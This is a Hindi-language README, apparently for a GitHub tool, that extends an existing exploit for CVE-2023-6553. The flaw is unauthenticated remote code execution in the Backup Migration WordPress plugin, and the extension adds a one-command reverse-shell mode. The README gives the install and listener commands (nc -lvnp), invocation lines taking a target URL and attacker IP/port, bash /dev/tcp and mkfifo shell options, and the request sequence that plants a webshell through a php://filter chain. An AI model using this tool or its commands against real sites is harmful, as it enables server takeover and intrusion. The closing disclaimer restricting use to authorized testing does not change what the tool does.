
यह एक्सप्लॉइट CVE-2023-6553 पर आधारित है और Chocapik द्वारा बनाए गए मूल एक्सप्लॉइट पर निर्मित है, इसमें यह जोड़ा गया है कि सीधे रिवर्स शेल प्राप्त किया जा सकता है।
Chocapikk का CVE-2023-6553 एक्सप्लॉइट का एक विस्तारित संस्करण जो मूल इंटरैक्टिव वेबशेल के ऊपर एक-कमांड रिवर्स शेल मोड जोड़ता है।
CVE-2023-6553 — Backup Migration WordPress प्लगिन (संस्करण ≤ 1.3.7) में बिना प्रमाणीकरण के रिमोट कोड निष्पादन।
यह प्लगिन backup-heart.php को उजागर करता है, जो Content-Dir HTTP हेडर से PHP फ़िल्टर चेन पढ़ता है और इसे बिना प्रमाणीकरण या सैनिटाइज़ेशन के include() में पास करता है। यह एक बिना प्रमाणीकरण वाले हमलावर को एक विशेष रूप से तैयार php://filter चेन इंजेक्ट करके मनमाना PHP कोड निष्पादित करने की अनुमति देता है।
मूल एक्सप्लॉइट Chocapikk द्वारा — सभी मुख्य एक्सप्लॉइटेशन लॉजिक (फ़िल्टर चेन जनरेशन, फ़ाइल लेखन, इंटरैक्टिव शेल) उनका काम है। यह रिपॉजिटरी केवल इसे रिवर्स शेल ट्रिगर मोड के साथ विस्तारित करती है।
| विशेषता | मूल (Chocapikk) | यह संस्करण |
|---|---|---|
| इंटरैक्टिव वेबशेल | ✅ | ✅ (अपरिवर्तित) |
| रिवर्स शेल | ❌ | ✅ (-r) |
| मल्टी-URL स्कैनिंग | ✅ | ✅ (अपरिवर्तित) |
| नए आर्ग्युमेंट | — | -r, -l, -p, --shell |
केवल निम्नलिखित जोड़े गए हैं:
trigger_reverse_shell() मेथड — वेबशेल तैनात होने के बाद (मूल जैसी ही प्रक्रिया), 0 पैरामीटर के रूप में रिवर्स शेल कमांड के साथ एक GET अनुरोध भेजता है, ठीक वैसे ही जैसे इंटरैक्टिव शेल भेजता है।main() में 5 पंक्तियाँ — जब -r मौजूद हो तो interactive_shell() को trigger_reverse_shell() से बदलें।बाकी सब कुछ — भेद्यता जाँच, फ़ाइल लेखन लूप, copy/unlink, इंटरैक्टिव मोड, मल्टी-URL स्कैनिंग — मूल से अछूता है।
pip install requests rich alive-progress prompt-toolkit php-filter-chain
# Start your listener first
rlwrap nc -lvnp 4444
# Run the exploit
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444
यदि टारगेट पर bash /dev/tcp उपलब्ध नहीं है, तो mkfifo का उपयोग करें (इसके बजाय nc पर निर्भर करता है):
python3 exploit.py -u http://TARGET/blog -r -l YOUR_IP -p 4444 --shell mkfifo
python3 exploit.py -u http://TARGET/blog
python3 exploit.py -u http://TARGET/blog -c
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt
-u / --url Target base URL (e.g. http://target/blog)
-r / --revshell Enable reverse shell mode
-l / --lhost Your IP to receive the shell (required with -r)
-p / --lport Your listener port (default: 4444)
--shell Shell type: bash (default) or mkfifo
-c / --check Check vulnerability only, do not deploy shell
-f / --file File with list of URLs to scan
-t / --threads Threads for multi-URL scan (default: 5)
-o / --output Output file for scan results
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
Content-Dir: php://filter/...<encoded PHP>
→ Writes webshell char by char to a temp file
→ Copies temp file to <random>.php
2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<cmd>
→ Executes command via backtick operator
→ Interactive mode: loops reading commands from stdin
→ Reverse shell mode: sends bash/mkfifo one-liner, connects to listener
3. Cleanup: unlink(<random>.php)
यह टूल केवल अधिकृत पेनेट्रेशन परीक्षण और सुरक्षा अनुसंधान के लिए है। उन सिस्टमों के खिलाफ उपयोग न करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।